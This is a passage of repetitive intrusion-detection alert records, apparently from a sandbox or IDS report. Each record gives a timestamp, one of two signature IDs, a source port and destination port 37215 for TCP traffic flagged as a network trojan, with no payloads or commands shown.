          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893286
          SID:2829579
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268694
          SID:2829579
          Source Port:51316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656144
          SID:2835222
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528960
          SID:2835222
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156303
          SID:2829579
          Source Port:56860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287604
          SID:2829579
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551188
          SID:2835222
          Source Port:33896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845465
          SID:2835222
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975449
          SID:2829579
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729092
          SID:2829579
          Source Port:60830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153358
          SID:2829579
          Source Port:57416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944013
          SID:2835222
          Source Port:43220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551190
          SID:2829579
          Source Port:47868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281586
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687410
          SID:2829579
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233465
          SID:2829579
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812812
          SID:2829579
          Source Port:46980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666641
          SID:2829579
          Source Port:37468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721837
          SID:2829579
          Source Port:53300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590894
          SID:2829579
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222871
          SID:2829579
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977717
          SID:2829579
          Source Port:33148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185617
          SID:2835222
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547671
          SID:2835222
          Source Port:47730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178428
          SID:2829579
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080721
          SID:2829579
          Source Port:46846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559808
          SID:2829579
          Source Port:58250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341791
          SID:2835222
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.915259
          SID:2829579
          Source Port:46746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462951
          SID:2829579
          Source Port:60240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927629
          SID:2835222
          Source Port:54582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298212
          SID:2835222
          Source Port:38814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112107
          SID:2829579
          Source Port:34280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352743
          SID:2835222
          Source Port:43430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481312
          SID:2829579
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550369
          SID:2835222
          Source Port:40908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207004
          SID:2835222
          Source Port:35556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464288
          SID:2835222
          Source Port:33032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729175
          SID:2835222
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846844
          SID:2835222
          Source Port:57728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870816
          SID:2835222
          Source Port:42966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359280
          SID:2829579
          Source Port:39874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273166
          SID:2829579
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301149
          SID:2835222
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045959
          SID:2829579
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204078
          SID:2829579
          Source Port:43300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400501
          SID:2829579
          Source Port:37614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338366
          SID:2835222
          Source Port:35270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669322
          SID:2835222
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727004
          SID:2829579
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529137
          SID:2835222
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466479
          SID:2835222
          Source Port:59798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710231
          SID:2835222
          Source Port:40212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403051
          SID:2835222
          Source Port:47238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476505
          SID:2835222
          Source Port:42104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852026
          SID:2829579
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178888
          SID:2835222
          Source Port:45948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760558
          SID:2835222
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322926
          SID:2829579
          Source Port:52810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213880
          SID:2829579
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873417
          SID:2835222
          Source Port:35756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611617
          SID:2829579
          Source Port:48724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141838
          SID:2829579
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327981
          SID:2829579
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861499
          SID:2835222
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466525
          SID:2835222
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959689
          SID:2829579
          Source Port:53314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170408
          SID:2835222
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273296
          SID:2835222
          Source Port:50048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403150
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299487
          SID:2829579
          Source Port:34612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812771
          SID:2835222
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215198
          SID:2829579
          Source Port:50278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326136
          SID:2829579
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922980
          SID:2835222
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610528
          SID:2829579
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664446
          SID:2829579
          Source Port:49130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652893
          SID:2835222
          Source Port:46218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177420
          SID:2829579
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593096
          SID:2835222
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741651
          SID:2835222
          Source Port:53108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803867
          SID:2829579
          Source Port:42226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084866
          SID:2829579
          Source Port:50996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173653
          SID:2829579
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482627
          SID:2835222
          Source Port:60930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894009
          SID:2835222
          Source Port:51852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537646
          SID:2829579
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229841
          SID:2835222
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075754
          SID:2835222
          Source Port:32914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088020
          SID:2829579
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622166
          SID:2829579
          Source Port:33380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889993
          SID:2829579
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797180
          SID:2835222
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221587
          SID:2829579
          Source Port:34940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678463
          SID:2829579
          Source Port:39280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868296
          SID:2829579
          Source Port:42956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221919
          SID:2829579
          Source Port:54582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805590
          SID:2829579
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923528
          SID:2835222
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.243706
          SID:2835222
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547743
          SID:2829579
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529934
          SID:2835222
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045322
          SID:2829579
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214695
          SID:2829579
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039603
          SID:2829579
          Source Port:50084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466134
          SID:2829579
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235793
          SID:2829579
          Source Port:51928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671919
          SID:2835222
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793381
          SID:2829579
          Source Port:49106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990499
          SID:2835222
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797189
          SID:2829579
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609479
          SID:2835222
          Source Port:60788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849243
          SID:2829579
          Source Port:37432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093806
          SID:2829579
          Source Port:49678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291594
          SID:2829579
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960751
          SID:2829579
          Source Port:33914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894009
          SID:2829579
          Source Port:49096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.794508
          SID:2829579
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240256
          SID:2835222
          Source Port:41100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725157
          SID:2835222
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178016
          SID:2835222
          Source Port:60390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176635
          SID:2835222
          Source Port:40464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269237
          SID:2835222
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299406
          SID:2835222
          Source Port:39814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245708
          SID:2835222
          Source Port:42620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083502
          SID:2829579
          Source Port:47746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321173
          SID:2835222
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526571
          SID:2829579
          Source Port:50100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176000
          SID:2829579
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222505
          SID:2835222
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045965
          SID:2829579
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529024
          SID:2829579
          Source Port:43244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197796
          SID:2835222
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160063
          SID:2835222
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153518
          SID:2829579
          Source Port:52176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893932
          SID:2829579
          Source Port:57056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977934
          SID:2829579
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849159
          SID:2829579
          Source Port:41178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216382
          SID:2829579
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908051
          SID:2829579
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498036
          SID:2835222
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860946
          SID:2829579
          Source Port:41474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.688995
          SID:2835222
          Source Port:35810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764237
          SID:2835222
          Source Port:34706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465213
          SID:2835222
          Source Port:36036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482806
          SID:2835222
          Source Port:47582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328134
          SID:2835222
          Source Port:47184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466074
          SID:2829579
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245835
          SID:2829579
          Source Port:54104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914288
          SID:2835222
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598657
          SID:2835222
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681186
          SID:2829579
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.805539
          SID:2829579
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051040
          SID:2829579
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756402
          SID:2835222
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528331
          SID:2829579
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105439
          SID:2829579
          Source Port:52208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136908
          SID:2835222
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065986
          SID:2835222
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403353
          SID:2835222
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711421
          SID:2829579
          Source Port:38600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337444
          SID:2829579
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669430
          SID:2835222
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063215
          SID:2829579
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145511
          SID:2829579
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.854104
          SID:2829579
          Source Port:51092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221013
          SID:2829579
          Source Port:43454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190702
          SID:2829579
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946596
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115456
          SID:2835222
          Source Port:37882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977376
          SID:2829579
          Source Port:40020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970543
          SID:2829579
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090713
          SID:2829579
          Source Port:42092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512618
          SID:2835222
          Source Port:43140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663064
          SID:2835222
          Source Port:43584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525369
          SID:2829579
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848520
          SID:2829579
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941497
          SID:2829579
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187260
          SID:2835222
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944931
          SID:2829579
          Source Port:47068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213272
          SID:2829579
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768689
          SID:2829579
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988638
          SID:2835222
          Source Port:39250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858774
          SID:2829579
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240198
          SID:2829579
          Source Port:43128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156856
          SID:2829579
          Source Port:60708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439031
          SID:2829579
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873839
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931152
          SID:2835222
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060173
          SID:2835222
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177879
          SID:2835222
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809470
          SID:2829579
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935090
          SID:2829579
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325801
          SID:2829579
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2835222
          Source Port:52640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284878
          SID:2835222
          Source Port:34216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987215
          SID:2835222
          Source Port:47390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
